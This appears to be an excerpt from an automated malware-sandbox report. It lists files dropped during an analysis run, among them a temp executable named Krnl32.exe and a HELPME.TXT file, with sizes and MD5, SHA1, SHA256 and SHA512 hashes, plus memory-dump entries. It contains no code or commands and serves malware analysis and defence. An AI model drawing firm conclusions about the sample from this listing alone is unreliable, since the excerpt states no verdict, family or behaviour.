Filesize
242B

MD5
1172d6571a13a3dbcf1c1a388519ba93

SHA1
4705fdf91001d1b06906c3cb5704b3d2bed9b344

SHA256
fd4eab26d9e67905d055b268e47d534dd99b1beb7292f789e759aaa1c487aab8

SHA512
c219e04418e4d97d5e7c39585adeded44ca749958991b4632224bf8fbfae33c0c8eb3d6e8e04894b3fa76c6d8e0743d025046d886ea570b0a5c9a874423970db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\sxsuh4u\imagestore.dat
Filesize
4KB

MD5
043ae8a2f1057b2cc168bba4450ccee6

SHA1
0730ed57e0621578a8291b61d97c447cf875884c

SHA256
01a83f2d6e1c138a20d6596f0341a6f39610f15916b906bd7cb6d8b5c8778e43

SHA512
d9f0625f58abb8067eb9b465ff0e717261ee39d9a72a492fc07ee02b75a5176d102469b416166fb519373154b5ebc5e97d11c441fbaada2903057c61d1357276

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\en[2].htm
Filesize
62KB

MD5
d8db562dd4b19b7d1dec71cee88fe513

SHA1
f8374927d7205976f2e63cdbe9d482902e203c3b

SHA256
f94ad6af48f4c786bf3644818a8926efbe57b12a9379f41b26f31b90ba6de7f0

SHA512
0dd3299f8f24ef9b9b838f33dbfe07215e1f460df2c5dfeb2500766449feb7786564b74503f15ecc145bdbaf742e8df9cfc26aadb13385e3a6d0d190a8717e55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\icon_web_60[1].png
Filesize
4KB

MD5
e9dbf6c742169ea700f8386bf639911b

SHA1
2fce93e1b217283c3d7c8ef275748ad69f840815

SHA256
3ce3371ecd679c4e218474046aa2a2ab067dbac5370b983aa8e7d91b208d816b

SHA512
2809218b84cda633e6c5c2e47d8d65c23c1ea05a88b5ee970c6bc6265223ef6e94f0d30605e1f15601ecdc68700eca299990314468a37109cac87b30c575d234

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabB30C.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\HELPME.TXT
Filesize
67B

MD5
057798d389930107a381a2690141ac1d

SHA1
e44f1c2475c0f2323507e141dcae53ffef51c624

SHA256
5ba8c75f08589b808a6e16225ea565734aeeb23edc40894174d2d135f5e8d3d2

SHA512
98b40b6a11027974b482cb645718d34c8ee707ad01d6eba05acbf15a3b8d7c762afc08fef6513623fefe6e297d77a838fbb980d944a4a8e864356dfabac473e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Krnl32.exe
Filesize
26KB

MD5
da6f8554b81f4cdc34a608e20b4c54af

SHA1
20d3c4130bd2c66776e783f604458a646ab7d089

SHA256
65d466264dcdd87bcc5a728d7a728af0a48b1266aedb8c219315d26fe87212ea

SHA512
d9ec95276d806dc853fe09d6e4ca83d4bc120029a11da12a0578e55bda604a43d808eb011f0e5a737bbe85db3828a6f8e26b9975f6c0be41a1bceda66c27e2b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB30D.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB42D.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
memory/2292-21-0x0000000000700000-0x0000000000713000-memory.dmp

Filesize
76KB

Download
memory/2292-0-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2292-24-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2292-10-0x0000000000700000-0x0000000000713000-memory.dmp

Filesize
76KB

Download
memory/2484-30-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2484-26-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2484-339-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2484-631-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2484-22-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2484-633-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2484-1230-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2484-1232-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download